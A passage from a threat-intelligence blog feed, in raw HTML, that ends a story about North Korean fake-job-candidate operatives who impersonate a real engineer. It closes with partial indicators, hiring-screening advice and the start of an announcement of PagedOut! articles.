https://substackcdn.com/image/fetch/$s_!OKbC!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!OKbC!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!OKbC!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fafd57ffa-0fa1-4c7e-9bca-e69e2e6c339b_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>And that&#8217;s exactly what happened. <strong>There&#8217;s not just one Jos&#233;, there are two</strong>: one who acts as the <strong>frontman</strong> in the first interview, knows his way around with westerners, can speak a little in a second language (enough to pass a first screening); and a second, more technical one who plays <strong>ghost coder</strong>, solving exercises and challenges for the first Jos&#233;.</p><p>These muppets move, think, and act as a group. Separately, they each lack a critical skill to land the job, whether it&#8217;s language proficiency, technical ability, or even something as basic as <em>common sense</em>. Their weird behaviour isn&#8217;t a minor thing: remember, they come from a <em>closeted</em> country, cut off from most of the world. Culturally and socially, this creates a noticeable gap. One that is easy to spot once you learn how to use it to your advantage. Ask them what cartoons from the country they claim to be from they liked as a kid. Ask about pastimes, hobbies, or if they know a specific place in their town. You can even invent one and see if they fall for the trap.</p><p>We finally rejected the candidate, and he quickly deleted all his accounts: LinkedIn, WhatsApp, Telegram, all gone.</p><p>Happy ending?</p><p>Not quite.</p><p>Because what if I told you&#8230; there was actually a <strong>third Jos&#233;</strong> in this play?</p><div><hr></div><h2><strong>Final Act: The Good, the Bad and the Ugly</strong></h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!PUI-!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!PUI-!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!PUI-!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!PUI-!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!PUI-!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!PUI-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png" width="410" height="410" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:410,&quot;bytes&quot;:1734564,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!PUI-!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!PUI-!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!PUI-!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!PUI-!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F24a91ab5-a89c-404f-baed-f43c32d8d8d8_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>There were <strong>three</strong> Jos&#233;s all along. Let me explain.</p><p>These operatives <strong>almost always copy real people&#8217;s profiles</strong> across different platforms, mimicking every detail. When hunting back Wage Moles or Famous Chollimas, it&#8217;s trivial to stumble upon <strong>the real person they&#8217;re impersonating</strong>.</p><p>That&#8217;s why it&#8217;s crucial <strong>not</strong> to hunt them based on surface-level details like (copied) names or online portfolios, which are often stolen. Instead, focus on digital artefacts tied to the actor or under their control: phone numbers, email accounts, IP addresses, and so on. Even if disposable, those artefacts can still yield intel, while also helping you avoid disrupting the life of someone innocent whose identity has been cloned.</p><p>In this story, the <strong>Bad Jos&#233;</strong> tried to scam us with his forked tongue, but failed.</p><p>The <strong>Ugly Jos&#233;</strong> hid behind him, buried in the shadows, showing only his claws to type out code as broken as his partner-in-crime&#8217;s alibi.</p><p>And the <strong>Good Jos&#233;</strong>?</p><p>Well, we won&#8217;t disclose his details for obvious reasons, but yes, we found him. And he truly earns the title. His identity was stolen along with his entire r&#233;sum&#233;. He&#8217;s an engineer, doing well in life, and an environmental activist in his community, something these muppets could never dream of.</p><p>And that&#8217;s exactly where these actors belong: <strong>buried in the ground, hiding from the light.</strong></p><div><hr></div><h2>IOCs, Extras &amp; A Hunter&#8217;s Note</h2><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!mwom!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!mwom!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!mwom!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!mwom!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!mwom!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!mwom!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png" width="274" height="411" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1536,&quot;width&quot;:1024,&quot;resizeWidth&quot;:274,&quot;bytes&quot;:3065214,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!mwom!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 424w, https://substackcdn.com/image/fetch/$s_!mwom!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 848w, https://substackcdn.com/image/fetch/$s_!mwom!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 1272w, https://substackcdn.com/image/fetch/$s_!mwom!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F4c7c79b7-58b7-4a05-89c5-c41fb8dbf5ed_1024x1536.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Given the nature and recency of the incident, and in order <strong>to protect the identity of the original Jos&#233;</strong>, only partial IOCs will be disclosed.</p><pre><code>Email:oscarjj0924@gmail.com
Phone:+522212528618 #(WhatsApp, Telegram)</code></pre><p>To compensate for this, and as thanks for reading this far, here&#8217;s a little extra.</p><p>The image of the Mole wearing a Mexican hat isn&#8217;t just satire, it&#8217;s actually a reference to a <em>real</em> profile <strong>picture used by the Mole on LinkedIn</strong>. A photo stolen from the <strong>original Jos&#233;</strong>, defaced with a Korean face clumsily pasted on top.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!-lSS!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!-lSS!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 424w, https://substackcdn.com/image/fetch/$s_!-lSS!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 848w, https://substackcdn.com/image/fetch/$s_!-lSS!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 1272w, https://substackcdn.com/image/fetch/$s_!-lSS!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!-lSS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png" width="274" height="410.3349514563107" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1234,&quot;width&quot;:824,&quot;resizeWidth&quot;:274,&quot;bytes&quot;:791227,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://quetzal.bitso.com/i/166765969?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!-lSS!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 424w, https://substackcdn.com/image/fetch/$s_!-lSS!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 848w, https://substackcdn.com/image/fetch/$s_!-lSS!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 1272w, https://substackcdn.com/image/fetch/$s_!-lSS!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5fd8fcd5-6bf1-4e41-aad2-6a18c1d9f321_824x1234.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>These campaigns are on the rise. Aside from the usual advice, I want to share a concern.</p><p>We have observed an interesting behaviour from <strong>Wage Mole</strong> operatives. They can copy and mimic <strong>every single detail of a LinkedIn account in little to no time</strong>. This suggests they may have developed a tool capable of using LinkedIn&#8217;s API or scraping its contents to automate that effort. We still lack full visibility and evidence on this matter, but it is something we are actively investigating.</p><p>Now the usual.</p><p>Stay safe.</p><p>Ask candidates to show IDs on your interviews (any proctored exam does it, anyway).</p><p>Don&#8217;t get <em>rekt</em>.</p><p>And do not hesitate to stomp on those muddy moles.</p><p>Do not let them overrun the garden you worked so hard to make bloom.</p>]]></content:encoded></item><item><title><![CDATA[Quetzal Team on PagedOut! eZine (again)]]></title><description><![CDATA[Spiders, Chollimas and lots of malware]]></description><link>https://quetzal.bitso.com/p/quetzal-team-on-pagedout-ezine-again</link><guid isPermaLink="false">https://quetzal.bitso.com/p/quetzal-team-on-pagedout-ezine-again</guid><dc:creator><![CDATA[Mauro Eldritch]]></dc:creator><pubDate>Thu, 24 Apr 2025 17:01:30 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!NW03!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!NW03!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!NW03!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 424w, https://substackcdn.com/image/fetch/$s_!NW03!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 848w, https://substackcdn.com/image/fetch/$s_!NW03!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!NW03!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!NW03!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg" width="256" height="256" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:400,&quot;width&quot;:400,&quot;resizeWidth&quot;:256,&quot;bytes&quot;:null,&quot;alt&quot;:&quot;Imagen&quot;,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="Imagen" title="Imagen" srcset="https://substackcdn.com/image/fetch/$s_!NW03!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 424w, https://substackcdn.com/image/fetch/$s_!NW03!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 848w, https://substackcdn.com/image/fetch/$s_!NW03!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!NW03!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F09b276ff-2133-4613-b777-fb34ba7faa96_400x400.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The Quetzal Team is proud to announce two new articles featured in <em><a href="https://pagedout.institute/">PagedOut! eZine</a></em>.</p><div><hr></div><h2>Spiders</h2><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!OEMf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!OEMf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 424w, https://substackcdn.com/image/fetch/$s_!OEMf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 848w, https://substackcdn.com/image/fetch/$s_!OEMf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 1272w, https://substackcdn.com/image/fetch/$s_!OEMf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!OEMf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe96636d4-7a20-4178-9e05-726f9e5e7c40_806x806.png" width="160" height="160" 